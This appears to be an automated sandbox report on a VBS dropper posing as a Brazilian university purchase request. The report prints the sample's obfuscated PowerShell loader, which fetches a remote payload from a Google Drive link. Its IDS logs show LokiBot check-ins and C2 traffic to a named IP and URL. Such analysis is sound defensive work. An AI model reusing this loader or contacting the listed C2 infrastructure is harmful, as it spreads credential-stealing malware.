Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Maniu
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:37.245797+020020243121A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:43:40.069355+020020243121A Network Trojan was detected192.168.2.549717137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:34.551355+020020253811Malware Command and Control Activity Detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:43:37.322517+020020253811Malware Command and Control Activity Detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:43:40.185853+020020253811Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:43.003130+020020253811Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:45.741448+020020253811Malware Command and Control Activity Detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:48.572785+020020253811Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:51.351558+020020253811Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:54.132906+020020253811Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:43:57.879403+020020253811Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:00.649720+020020253811Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:03.369738+020020253811Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:06.239645+020020253811Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:09.041359+020020253811Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:11.889231+020020253811Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:15.693620+020020253811Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:18.475108+020020253811Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:21.209924+020020253811Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:23.931600+020020253811Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:26.709116+020020253811Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:29.403730+020020253811Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:32.156332+020020253811Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:34.894944+020020253811Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:37.656693+020020253811Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:40.680871+020020253811Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:43.545598+020020253811Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:46.240169+020020253811Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:48.957161+020020253811Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:51.716387+020020253811Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:54.419846+020020253811Malware Command and Control Activity Detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:57.163238+020020253811Malware Command and Control Activity Detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:44:59.847504+020020253811Malware Command and Control Activity Detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:42.828237+020020243131Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:45.589348+020020243131Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:48.330751+020020243131Malware Command and Control Activity Detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:51.195415+020020243131Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:53.977861+020020243131Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:57.727197+020020243131Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:44:00.486167+020020243131Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:03.214345+020020243131Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:06.087551+020020243131Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:08.879359+020020243131Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:11.705337+020020243131Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:15.545751+020020243131Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:18.317194+020020243131Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:21.054335+020020243131Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:23.780395+020020243131Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:26.561735+020020243131Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:29.245863+020020243131Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:31.998664+020020243131Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:34.719619+020020243131Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:37.488199+020020243131Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:40.272417+020020243131Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:43.361554+020020243131Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:46.086297+020020243131Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:48.810480+020020243131Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:51.554232+020020243131Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:54.256457+020020243131Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:57.002316+020020243131Malware Command and Control Activity Detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:59.702074+020020243131Malware Command and Control Activity Detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:45:02.415633+020020243131Malware Command and Control Activity Detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:42.828237+020020243181Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:45.589348+020020243181Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:48.330751+020020243181Malware Command and Control Activity Detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:51.195415+020020243181Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:53.977861+020020243181Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:57.727197+020020243181Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:44:00.486167+020020243181Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:03.214345+020020243181Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:06.087551+020020243181Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:08.879359+020020243181Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:11.705337+020020243181Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:15.545751+020020243181Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:18.317194+020020243181Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:21.054335+020020243181Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:23.780395+020020243181Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:26.561735+020020243181Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:29.245863+020020243181Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:31.998664+020020243181Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:34.719619+020020243181Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:37.488199+020020243181Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:40.272417+020020243181Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:43.361554+020020243181Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:46.086297+020020243181Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:48.810480+020020243181Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:51.554232+020020243181Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:54.256457+020020243181Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:57.002316+020020243181Malware Command and Control Activity Detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:59.702074+020020243181Malware Command and Control Activity Detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:45:02.415633+020020243181Malware Command and Control Activity Detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:34.551355+020020216411A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:43:37.322517+020020216411A Network Trojan was detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:43:40.185853+020020216411A Network Trojan was detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:43.003130+020020216411A Network Trojan was detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:45.741448+020020216411A Network Trojan was detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:48.572785+020020216411A Network Trojan was detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:51.351558+020020216411A Network Trojan was detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:54.132906+020020216411A Network Trojan was detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:43:57.879403+020020216411A Network Trojan was detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:00.649720+020020216411A Network Trojan was detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:03.369738+020020216411A Network Trojan was detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:06.239645+020020216411A Network Trojan was detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:09.041359+020020216411A Network Trojan was detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:11.889231+020020216411A Network Trojan was detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:15.693620+020020216411A Network Trojan was detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:18.475108+020020216411A Network Trojan was detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:21.209924+020020216411A Network Trojan was detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:23.931600+020020216411A Network Trojan was detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:26.709116+020020216411A Network Trojan was detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:29.403730+020020216411A Network Trojan was detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:32.156332+020020216411A Network Trojan was detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:34.894944+020020216411A Network Trojan was detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:37.656693+020020216411A Network Trojan was detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:40.680871+020020216411A Network Trojan was detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:43.545598+020020216411A Network Trojan was detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:46.240169+020020216411A Network Trojan was detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:48.957161+020020216411A Network Trojan was detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:51.716387+020020216411A Network Trojan was detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:54.419846+020020216411A Network Trojan was detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:57.163238+020020216411A Network Trojan was detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:44:59.847504+020020216411A Network Trojan was detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:30.047966+020028032702Potentially Bad Traffic192.168.2.549714142.250.184.238443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://137.184.191.215/index.php/check.php?s=am9ntjjwVirustotal: Detection: 14%Perma Link
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsVirustotal: Detection: 12%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
